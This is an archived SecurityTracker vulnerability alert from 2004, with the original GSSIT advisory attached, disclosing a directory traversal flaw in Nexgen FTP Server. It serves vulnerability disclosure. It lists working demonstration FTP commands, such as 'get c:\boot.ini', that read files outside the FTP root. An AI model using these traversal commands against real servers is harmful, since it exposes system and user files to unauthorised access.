SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (File Transfer/Sharing)  >  Nexgen FTP Server Vendors:  nexgenserver.com
Nextgen FTP Server Discloses Arbitrary Files to Remote Authenticated Users
SecurityTracker Alert ID:  1009545
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 24 2004
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes   Vendor Confirmed:  Yes  
Advisory:  Global Security Solution IT (GSSIT)
Description:  Ziv Kamir of Global Security Solution IT reported a file disclosure vulnerability in the Nextgen FTP Server. A remote authenticated user can view files on the target system that are located outside of the FTP root directory.

It is reported that a remote authenticated user can view files located outside of the FTP directory by using absolute path names or '..' directory traversal characters in FTP commands.

Some demonstration exploit FTP commands are provided:

ls c:\*.*
ls ..
ls \..\
ls /../
dir c:\
dir \..\*.*
get c:\"Exist File"
get \..\"Exist File"

The vendor was reportedly notified on March 23, 2004.
Impact:  A remote authenticated user, including an anonymous user, can view files on the target system with the privileges of the FTP service.
Solution:  No solution was available at the time of this entry. The vendor has reportedly generated a fix that will be released pending testing of the new fix.
Vendor URL:  nexgenserver.com/NexgenFTPServer/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)
Reported By:  GSS IT <gss_it@yahoo.com>
Message History:   None.

 Source Message Contents
Date:  Wed, 24 Mar 2004 02:24:45 -0800 (PST)
From:  GSS IT <gss_it@yahoo.com>
Subject:  Nexgen FTP Server

 

This is a multi-part message in MIME format.
--------------050002060104030609080701
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit




Do you Yahoo!?
*Yahoo! Finance Tax Center* <http://taxes.yahoo.com/filing.html> - File
online. File on time.



--------------050002060104030609080701
Content-Type: text/plain;
 name="Nexgen.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="Nexgen.txt"

24/03/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Nexgen FTP Server  
Web Site:    http://www.nexgenserver.com/
Versions:    
Platform:    Windows 
Bug  :       Directory Traversal
            
             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

Developed using the Nexgen Server SDK, the Nexgen FTP Server is a full-featured FTP Server that can b
e easily customized to fit your
 needs. Running as a service on your PC, the Nexgen FTP Server gives you peace of mind because you'll
 always know that if the PC is
 running, then the server is running. 

Included with the Nexgen FTP Server is an administration application that you can use to remotely mon
itor and/or configure the Nexgen
 FTP Server. Use the administration application to manage all aspects of the FTP Server (or servers) 
that are running on the service's
 PC. 


=======
2) Bugs
=======

1) Directory Traversal
    

===========
3) The Code
===========


1) Any authenticated user can read arbitrary files outside the FTP root Directory


  ls  c:\*.*
  ls  ..
  ls  \..\
  ls  /../
  dir c:\
  dir \..\*.*
  get c:\"Exist File" [ c:\boot.ini ]
  get \..\"Exist File"


======
4) Fix
======

Date of Vendor Notification:
----------------------------

23/03/04

Response:
---------

24/03/04

Thanks .  I've tested some new code, and I think I've got it squashed
I'll get it uploaded after I test out the installations .



==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================

--------------050002060104030609080701--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC